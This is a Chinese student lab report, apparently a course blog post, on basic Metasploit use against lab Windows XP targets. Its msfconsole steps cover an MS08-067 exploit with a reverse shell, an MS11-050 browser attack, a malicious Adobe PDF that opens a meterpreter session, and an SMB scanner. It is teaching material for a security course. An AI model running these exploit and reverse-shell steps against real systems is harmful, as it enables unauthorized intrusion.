20155323刘威良《网络对抗》Exp5 MSF基础应用

实践内容

本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成：

1.1一个主动攻击实践，如ms08_067; （1分）

1.2 一个针对浏览器的攻击，如ms11_050；（1分）

1.3 一个针对客户端的攻击，如Adobe；（1分）

1.4 成功应用任何一个辅助模块。（0.5分）

以上四个小实践可不限于以上示例，并要求至少有一个是和其他所有同学不一样的，否则扣除0.5分。

实践过程

Windows服务渗透攻击——MS08-067安全漏洞

• 攻击机：kali IP:192.168.11.129

• 靶机：windows XP SP3 (English) IP:192.168.11.130

首先在kali中打开命令行进入msfconsole控制台,然后输入命令 search ms08_067查询攻击模块

然后输入命令show payloads查看可用的攻击载荷，发现payload generic/shell_reverse_tcp可用，输入命令set payload generic/shell_reverse_tcp设置载荷。

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入set RHOST 192.168.11.130设置靶机IP

输入set target 0设置自动选择目标系统类型

输入exploit开始攻击

一开始使用中文版xp一直提示无法创建，后来换了英文版xp才攻击成功

systeminfo命令可查看靶机信息

浏览器渗透攻击——MS11-050

• 攻击机：kali IP:192.168.11.129

• 靶机：windows XP SP3 (中文简体) IP:192.168.11.128

还是打开msfconsole控制台，然后输入命令use windows/browser/ms11_050_mshtml_cobjectelement设置攻击模块

输入set payload windows/meterpreter/reverese_http设置payload

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入set URIPATH baidu设置统一资源标识符路径

输入set target 1

输入exploit开始攻击

然后在靶机上打开IE浏览器，输入刚刚生成的网址http://192.168.11.129:8080/baidu

但是这里IE浏览器就失去反应了，询问了其他同学也没有解决方法。

针对Office软件的渗透攻击——MS10-087

还是打开msfconsole控制台,输入use windows/fileformat/adobe_cooltype_sing设置攻击模块

输入use windows/fileformat/adobe_cooltype_sing设置payload

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入set FILENAME exp5_5336.pdf设置生成文件名

输入exploit开始攻击

这里我们生成了一个文件exp5_5336.pdf

但是由于kali隐藏了部分文件夹，我们需要手动设置显示隐藏文件夹才能找到这个pdf文件

输入back返回，然后输入use exploit/multi/handler开始监听

输入set payload windows/meterpreter/reverse_tcp反向连接tcp

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入exploit开始攻击

然后把生成的pdf文件传到xp系统中并且打开

攻击成功，可以输入ipconfig查看ip信息

成功应用任何一个辅助模块

打开msfconsole控制台输入show auxiliary查看辅助模块

输入use auxiliary/scanner/smb/smb_version选择辅助模块

输入show options查看需要设置什么并设置

应用成功

回答问题

（1）用自己的话解释什么是exploit,payload,encode

exploit: 就是利用发现的漏洞和配置好的信息攻击靶机的指令

payload：攻击载荷，在它传到靶机中后执行相应的代码

encode：编码器

实践总结与体会

这次实验并不困难，但是模块太多，第一次接触有点眼花缭乱，所以只能跟着其他同学做，有空希望自己可以试试更多的模块。还有第一个实践不知道为什么其他同学的中文xp系统可以攻击，我的xp关闭了防火墙，也可以和kali互ping，但是还是攻击失败，最后只能选择英文版xp。

离实战还缺些什么技术或步骤？

还差的很远，尝试过的模块只是九牛一毛，如果要实战还需要很多时间去研究其他模块。

20155323刘威良《网络对抗》Exp5 MSF基础应用的更多相关文章

1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

   2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

   2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

   2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

4. 20155323刘威良 网络对抗 Exp2 后门原理与实践

   20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

5. 2018-2019 20165220 网络对抗 Exp5 MSF基础

   实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

6. 2018-2019 20165219 网络对抗 Exp5 MSF基础

   实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

7. 20155323刘威良 网络对抗《网络攻防》 Exp1 PC平台逆向破解&lpar;5&rpar;M

   实践目标 本次实践的对象是linux的可执行文件 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可 ...

8. 20145338 《网络对抗》 MSF基础应用

   20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

9. 20145308 《网络对抗》 MSF基础应用 学习总结

   20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

10. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

随机推荐

1. 【CSharp】C&num;中equals与&equals;&equals;小记

       序:        昨天技术群中的一个小伙伴发了几个字符串以及值类型比较的面试题,没想到我们的答案不尽人意...下面是截图以及答案,看看与各位看官的答案是否相同.                ...

2. PHP操作FTP类 &lpar;上传下载移动创建等&rpar;

   使用PHP操作FTP-用法 Php代码 收藏代码 <? // 联接FTP服务器 $conn = ftp_connect(ftp.server.com); // 使用username和passwo ...

3. 各浏览器对 onbeforeunload 事件的支持与触发条件实现有差异

   转载:http://www.w3help.org/zh-cn/causes/BX2047 标准参考 无. 问题描述 一般情况下,onbeforeunload 事件处理函数内会写入一些提示性语句,当用户 ...

4. 架设WIN32汇编程序的开发环境

   笔者在学习Windows下的图形界面应用程序(GUI,Graphical User Interface)的时候碰到的第一个麻烦就是架设WIN32汇编程序的开发环境,在这里笔者愿意和大家分享这段经历. ...

5. Java AOP &lpar;1&rpar; compile time weaving 【Java 切面编程 &lpar;1&rpar; 编译期织入】

   According to wikipedia  aspect-oriented programming (AOP) is a programming paradigm that aims to inc ...

6. Asynchronous MQTT client library for C （MQTT异步客户端C语言库-paho）

   原文:http://www.eclipse.org/paho/files/mqttdoc/MQTTAsync/html/index.html MQTT异步客户端C语言库   用于C的异步 MQTT 客 ...

7. &lbrack;Swift&rsqb;LeetCode105&period; 从前序与中序遍历序列构造二叉树 &vert; Construct Binary Tree from Preorder and Inorder Traversal

   Given preorder and inorder traversal of a tree, construct the binary tree. Note:You may assume that ...

8. GUI的最终选择Tkinter模块练习篇

   一.Canvas画布练习 1)简单的绘制图框 from tkinter import * # 构建一个窗口 tk = Tk() # 画布 canvas= Canvas(tk,width=,height ...

9. Bootstrap——导航居中

   这是采用了栅格,设置缩进,使看起来居中,但是手机浏览会靠到最左边.另外center-block类好像也不管用. <div class="row"> <ul cla ...

10. phaser相关

    phaser.js这个插件,中文翻译的开发文档还在翻译中,至于英文的开发文档,勉勉强强查阅,有些方法名和开发文档的有着一些区别,开发文档上时带着er的.不过大体上还是一一对应查找的到的 eg:load ...